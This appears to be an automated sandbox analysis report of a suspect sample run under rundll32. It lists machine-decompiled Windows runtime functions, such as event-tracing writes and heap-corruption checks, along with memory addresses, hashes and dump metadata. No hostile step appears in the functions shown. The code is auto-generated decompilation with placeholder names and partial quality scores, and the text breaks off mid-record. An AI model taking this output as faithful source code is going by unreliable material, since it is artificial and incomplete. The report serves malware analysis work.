				_t30 = __edx;
				_t31 = __ecx;
				E0461FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E045F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0461B640(E04619AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x0468fec0
                                                                                            0x0468fec0
                                                                                            0x0468fecf
                                                                                            0x0468fed9
                                                                                            0x0468fede
                                                                                            0x0468fee0
                                                                                            0x0468feeb
                                                                                            0x0468fef3
                                                                                            0x0468fef6
                                                                                            0x0468fef9
                                                                                            0x0468ff04
                                                                                            0x0468ff16
                                                                                            0x0468ff06
                                                                                            0x0468ff0f
                                                                                            0x0468ff0f
                                                                                            0x0468ff21
                                                                                            0x0468ff22
                                                                                            0x0468ff24
                                                                                            0x0468ff29
                                                                                            0x0468ff3e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 559200d49f9716058f5f5f26456eefb0c98f77b087aaa7eb88bb3c822c6586ed
                                                                                            • Instruction ID: 375e5fa790a0e6739c9df4ddd7a88f84e29f06db04b8a3a559c8d00daf2bb501
                                                                                            • Opcode Fuzzy Hash: 559200d49f9716058f5f5f26456eefb0c98f77b087aaa7eb88bb3c822c6586ed
                                                                                            • Instruction Fuzzy Hash: 4301D471E00208ABDB14EBA9D845FAEB7B8EF44700F04406AB900EB390FA34AA01C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8A62 Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E046A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x46cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E045F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0461B640(E04619AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                                                            0x046a8a62
                                                                                            0x046a8a71
                                                                                            0x046a8a79
                                                                                            0x046a8a82
                                                                                            0x046a8a85
                                                                                            0x046a8a89
                                                                                            0x046a8a8c
                                                                                            0x046a8a8f
                                                                                            0x046a8a92
                                                                                            0x046a8a95
                                                                                            0x046a8a9f
                                                                                            0x046a8ab1
                                                                                            0x046a8aa1
                                                                                            0x046a8aaa
                                                                                            0x046a8aaa
                                                                                            0x046a8abc
                                                                                            0x046a8abd
                                                                                            0x046a8abf
                                                                                            0x046a8ac4
                                                                                            0x046a8ada

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8cb461c4d7078be9d72e365ee16879db07f582556c06ac27fc2f0963b3a8adc8
                                                                                            • Instruction ID: c1db61cc5b843a94041ad9812aad8f8d53bee120c4adef261d47d09deb298fb5
                                                                                            • Opcode Fuzzy Hash: 8cb461c4d7078be9d72e365ee16879db07f582556c06ac27fc2f0963b3a8adc8
                                                                                            • Instruction Fuzzy Hash: E0012CB1A0021DAFDB00EFA9D9459AEB7B8FF48710F14405AFA04E7351E634AD11CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8ED6 Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E046A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x46cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E045F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0461B640(E04619AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                                                            0x046a8ed6
                                                                                            0x046a8ee5
                                                                                            0x046a8eed
                                                                                            0x046a8ef0
                                                                                            0x046a8efa
                                                                                            0x046a8f03
                                                                                            0x046a8f0c
                                                                                            0x046a8f15
                                                                                            0x046a8f24
                                                                                            0x046a8f27
                                                                                            0x046a8f31
                                                                                            0x046a8f43
                                                                                            0x046a8f33
                                                                                            0x046a8f3c
                                                                                            0x046a8f3c
                                                                                            0x046a8f4e
                                                                                            0x046a8f4f
                                                                                            0x046a8f51
                                                                                            0x046a8f56
                                                                                            0x046a8f69

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 71a5c0249f0d0eca7df52e84e850759e2a957aea1d227926a2f0a38027935d54
                                                                                            • Instruction ID: 76d9dd17a7f5d8c83de00f0156e2e044be24f24d60dc6d472e89c5e70e172d19
                                                                                            • Opcode Fuzzy Hash: 71a5c0249f0d0eca7df52e84e850759e2a957aea1d227926a2f0a38027935d54
                                                                                            • Instruction Fuzzy Hash: 44111E70E006099FDB04DFA9D541BAEB7F4FF08300F0442AAE918EB381E634A941CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DDB60 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E045DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E045DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L045DE8B0(__ecx, _t14, 0xfff);
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                                                            0x045ddb64
                                                                                            0x045ddb66
                                                                                            0x045ddb6b
                                                                                            0x045ddbaa
                                                                                            0x045ddb71
                                                                                            0x045ddb76
                                                                                            0x045ddb7a
                                                                                            0x045ddba3
                                                                                            0x045ddb7c
                                                                                            0x045ddb87
                                                                                            0x045ddb8b
                                                                                            0x04634fa1
                                                                                            0x04634fb3
                                                                                            0x04634fb8
                                                                                            0x045ddb91
                                                                                            0x045ddb96
                                                                                            0x045ddb98
                                                                                            0x045ddb98
                                                                                            0x045ddb8b
                                                                                            0x045ddb7a
                                                                                            0x045ddb9d
                                                                                            0x045ddba2

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction ID: e3975c4efbfb2b47ffa52f21f69e9b8bbd1b1c0104a6a86ba2a52feb5de4418a
                                                                                            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                                                            • Instruction Fuzzy Hash: 4EF0C8332419639BF3725A5D8880B67A6A5AFC1A68F150435F1059B244C964B806BED1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DB1E1 Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E045F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E045F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04657016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                                                            0x045db1e8
                                                                                            0x045db1ea
                                                                                            0x045db1f3
                                                                                            0x04634a17
                                                                                            0x045db1f9
                                                                                            0x045db1f9
                                                                                            0x045db1f9
                                                                                            0x045db201
                                                                                            0x04634a21
                                                                                            0x04634a2e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04634a3b
                                                                                            0x04634a4d
                                                                                            0x04634a3d
                                                                                            0x04634a46
                                                                                            0x04634a46
                                                                                            0x04634a55
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045db20a
                                                                                            0x045db20a
                                                                                            0x045db20a
                                                                                            0x045db20a

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction ID: 357f5a0c4e42c9ca60d27b0cea8dd965c2a483eead9cadba26421be34481580c
                                                                                            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                            • Instruction Fuzzy Hash: 4B018132200680ABD3329B5DC804F69BB99FF95754F0A44A2FA158B7B5EA79F840E315
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0466FE87 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E0466FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x46cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E045F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                                                            0x0466fe96
                                                                                            0x0466fe9e
                                                                                            0x0466fea1
                                                                                            0x0466fead
                                                                                            0x0466feb3
                                                                                            0x0466feb9
                                                                                            0x0466fec3
                                                                                            0x0466fed5
                                                                                            0x0466fec5
                                                                                            0x0466fece
                                                                                            0x0466fece
                                                                                            0x0466fee0
                                                                                            0x0466fee1
                                                                                            0x0466fee3
                                                                                            0x0466fee8
                                                                                            0x0466fefb

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7eb6c19fb78a5807ebfebe42c663049a6b15ccdf197d902a87214d445caaaebf
                                                                                            • Instruction ID: 9a357485c2e9e962745722470812a0fd4387052d206966499744cadf43e3c6a1
                                                                                            • Opcode Fuzzy Hash: 7eb6c19fb78a5807ebfebe42c663049a6b15ccdf197d902a87214d445caaaebf
                                                                                            • Instruction Fuzzy Hash: 9D016270A00208AFCB14DFA8D541A6EBBF4FF08304F144169A505DB392E635E902CB84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8F6A Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 48%
                                                                                            			E046A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E045F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0461B640(E04619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                            0x046a8f6a
                                                                                            0x046a8f79
                                                                                            0x046a8f81
                                                                                            0x046a8f84
                                                                                            0x046a8f8b
                                                                                            0x046a8f91
                                                                                            0x046a8f94
                                                                                            0x046a8f9e
                                                                                            0x046a8fb0
                                                                                            0x046a8fa0
                                                                                            0x046a8fa9
                                                                                            0x046a8fa9
                                                                                            0x046a8fbb
                                                                                            0x046a8fbc
                                                                                            0x046a8fbe
                                                                                            0x046a8fc3
                                                                                            0x046a8fd6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 97c56553868df5ec26a897245038c9a801b5b3862a6f820f940104d0935cce7c
                                                                                            • Instruction ID: 4010628ec88bab270f663f1e7d697745009ab949aaf9dd964187e6cf1ed5b447
                                                                                            • Opcode Fuzzy Hash: 97c56553868df5ec26a897245038c9a801b5b3862a6f820f940104d0935cce7c
                                                                                            • Instruction Fuzzy Hash: 31013174A00209AFDB00EFA8D545AAEB7B4FF58300F50405AB905EB391EA34EA10DB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0469131B Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 48%
                                                                                            			E0469131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x46cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E045F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0461B640(E04619AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                            0x0469131b
                                                                                            0x0469132a
                                                                                            0x04691330
                                                                                            0x04691336
                                                                                            0x0469133e
                                                                                            0x04691341
                                                                                            0x04691344
                                                                                            0x0469134f
                                                                                            0x04691361
                                                                                            0x04691351
                                                                                            0x0469135a
                                                                                            0x0469135a
                                                                                            0x0469136c
                                                                                            0x0469136d
                                                                                            0x0469136f
                                                                                            0x04691374
                                                                                            0x04691387

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a54dbc80f65dbfacd61f26f51d3da13a4b84f4c479b7d00ca6ecee8577632f8
                                                                                            • Instruction ID: 3837a1f811417d6d1b57373b8b4f82adc5c801e8e85729cd38dc4ad8b4c598ab
                                                                                            • Opcode Fuzzy Hash: 2a54dbc80f65dbfacd61f26f51d3da13a4b84f4c479b7d00ca6ecee8577632f8
                                                                                            • Instruction Fuzzy Hash: 1A013171A0120DAFDB04DFA9D545AAEB7F4FF48700F50405AB945EB351E674AA00CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04691608 Relevance: .0, Instructions: 34COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 46%
                                                                                            			E04691608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x46cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E045F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0461B640(E04619AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                            0x04691608
                                                                                            0x04691617
                                                                                            0x0469161d
                                                                                            0x04691625
                                                                                            0x04691628
                                                                                            0x0469162b
                                                                                            0x04691636
                                                                                            0x04691648
                                                                                            0x04691638
                                                                                            0x04691641
                                                                                            0x04691641
                                                                                            0x04691653
                                                                                            0x04691654
                                                                                            0x04691656
                                                                                            0x0469165b
                                                                                            0x0469166e

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86b41e1649b3346a6e8d0b74c439efbc8640e1e74b1ce23c5f7a04b015a5f3ba
                                                                                            • Instruction ID: 631224fc7e02d1bd4f9c42af7ee00d0ffc62649811552ef527f8d4680f44bd52
                                                                                            • Opcode Fuzzy Hash: 86b41e1649b3346a6e8d0b74c439efbc8640e1e74b1ce23c5f7a04b015a5f3ba
                                                                                            • Instruction Fuzzy Hash: ABF06271E00248EFDB04DFA9D415AAEB7F8FF19300F444069A905EB391F674AD00CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FC577 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E045FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x45b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E046A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                            0x045fc577
                                                                                            0x045fc57d
                                                                                            0x045fc581
                                                                                            0x045fc5b5
                                                                                            0x045fc5b9
                                                                                            0x045fc5ce
                                                                                            0x045fc5ce
                                                                                            0x045fc5ca
                                                                                            0x00000000
                                                                                            0x045fc5ca
                                                                                            0x045fc5c4
                                                                                            0x045fc5c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045fc5ad
                                                                                            0x00000000
                                                                                            0x045fc5af

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac3e7d363c2a2f2f4b3b60fba299d69d89f70032ecde3aa65d265fae3da82ce3
                                                                                            • Instruction ID: 72bb8e237ad6a6ab802310280cc10e31224beca8215c1bfcaa2b776cd2a82b82
                                                                                            • Opcode Fuzzy Hash: ac3e7d363c2a2f2f4b3b60fba299d69d89f70032ecde3aa65d265fae3da82ce3
                                                                                            • Instruction Fuzzy Hash: F2F0B4B2D166AC9FE733DB64E804B227BD4BB06774F444877D60587202D6A4FC80E653
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04692073 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 94%
                                                                                            			E04692073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0468FD22(__ecx);
				_t19 =  *0x46c849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x46c8748; // 0x0
					if(__eflags <= 0) {
						E04691C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x46c8724 & 0x00000004;
							if(( *0x46c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x46c8724; // 0x0
					return E04688DF1(__ebx, 0xc0000374, 0x46c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                            0x04692076
                                                                                            0x04692078
                                                                                            0x0469207d
                                                                                            0x04692083
                                                                                            0x046920a4
                                                                                            0x046920aa
                                                                                            0x046920ac
                                                                                            0x046920b7
                                                                                            0x046920ba
                                                                                            0x046920bc
                                                                                            0x046920c9
                                                                                            0x046920c9
                                                                                            0x046920d0
                                                                                            0x046920d2
                                                                                            0x00000000
                                                                                            0x046920d2
                                                                                            0x046920be
                                                                                            0x046920c3
                                                                                            0x046920c5
                                                                                            0x046920c7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046920c7
                                                                                            0x046920bc
                                                                                            0x046920d4
                                                                                            0x04692085
                                                                                            0x04692085
                                                                                            0x046920a3
                                                                                            0x046920a3

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2775e2b7955a173f1a8547d6e551bf44c911cace3841511afe959d07a360ece
                                                                                            • Instruction ID: 3464c5148d75c4314728e6943da06092495f0c3bc37df115e773f44cffe65ddd
